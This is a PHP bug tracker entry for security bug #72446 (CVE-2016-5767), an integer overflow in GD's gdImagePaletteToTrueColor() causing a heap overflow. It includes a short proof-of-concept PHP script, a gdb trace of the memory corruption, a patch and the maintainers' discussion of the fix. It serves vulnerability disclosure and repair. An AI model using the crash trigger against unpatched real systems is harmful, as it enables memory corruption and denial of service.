php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72446 Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
Submitted: 2016-06-18 15:55 UTC Modified: 2016-06-23 12:33 UTC
From: gogil at stealien dot com Assigned: pajoye (profile)
Status: Closed Package: GD related
PHP Version: 5.5.36 OS: Ubuntu i386
Private report: No CVE-ID: 2016-5767
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: gogil at stealien dot com
New email:
PHP Version: OS:

 

 [2016-06-18 15:55 UTC] gogil at stealien dot com
Description:
------------
The gdImagePaletteToTrueColor() is prone to an integer overflow, which result in heap based overflow.

Tested on 32-bits.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b libgd/gd.c:3035
Breakpoint 1 at 0x823a806: file /php/php-5.6.22/ext/gd/libgd/gd.c, line 3035.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3035
3035		const unsigned int sx = gdImageSX(src);
(gdb) n
3037		src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
(gdb) p/x sx
$1 = 0x40000000    <---------- 'sx' is 0x40000000.

(gdb) n
...
3047		src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));  <---------- sizeof(int) is 0x4.
<---------- gdMalloc will allocate memory with size 0. (LP32/LP64 only)

...
3052		dst_row = src->tpixels[y];
(gdb) n
3053		for (x = 0; x < sx; x++) {
...
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
(gdb) x/x dst_row+x
0xb4f96160:	0x2d9c25e0
(gdb) n
3053		for (x = 0; x < sx; x++) {
(gdb) x/x dst_row+x
0xb4f96160:	0x61616161    <---------- It cause heap overflow


(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0823a974 in gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3058
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);




* Fix
File libgd/gd.c, line 123:
gdImagePtr gdImageCreate (int sx, int sy)
{
	int i;
	gdImagePtr im;

	if (overflow2(sx, sy)) {
		return NULL;
	}

	if (overflow2(sizeof(unsigned char *), sy)) {
		return NULL;
	}

+	if (overflow2(sizeof(int), sx)) {
+		return NULL;
+	}

	im = (gdImage *) gdCalloc(1, sizeof(gdImage));



Test script:
---------------
<?php
// poc.php
ini_set('memory_limit', -1);
$im = imagecreate(0x40000000, 1);
imagecolorallocatealpha($im, 0x61, 0x61, 0x61, 0x61);

imagepalettetotruecolor($im);
?>


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-19 03:54 UTC] stas@php.net
Looks like the issue is in libgd which means it should be reported to libgd maintainers.
 [2016-06-19 04:21 UTC] gogil at stealien dot com
libgd(2.0.34RC~lasted) is not affected by this vulnerability.
php's gdImageCreate() function used a slightly different routine.
 [2016-06-19 05:02 UTC] stas@php.net
-Assigned To: +Assigned To: pajoye
 [2016-06-19 05:02 UTC] stas@php.net
Pierre, could you take a look? Looks like merge is missing or something?
 [2016-06-19 07:43 UTC] pajoye@php.net
It should be:


	if (overflow2(sizeof (unsigned char *), sy)) {
		return NULL;
	}
	if (overflow2(sizeof (unsigned char *), sx)) {
		return NULL;
	}

palette image uses an 2D array of unsigned chars.

Gogil, Stas, thanks for all the reviews and fixes :) 

@Gogil btw, be sure to check in https://github.com/libgd/libgd as it seems you are looking to an old repo with 2.0.34 (bitbucket?) as latest version.
 [2016-06-19 10:07 UTC] gogil at stealien dot com
libgd(2.0.34RC~latest) is not affected by this vulnerability.

I am sorry for my typo mistake.
 [2016-06-19 14:52 UTC] pajoye@php.net
I got that thanks:)

What I mean is the latest release is 2.2.1 and 2.2.2 should come this week. :)
 [2016-06-19 15:52 UTC] gogil at stealien dot com
I got it.

thanks :)
 [2016-06-21 06:59 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 06:59 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 07:03 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.5.36
 [2016-06-21 07:03 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:27 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-22 05:57 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-23 12:33 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5767
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Sep 17 05:01:27 2024 UTC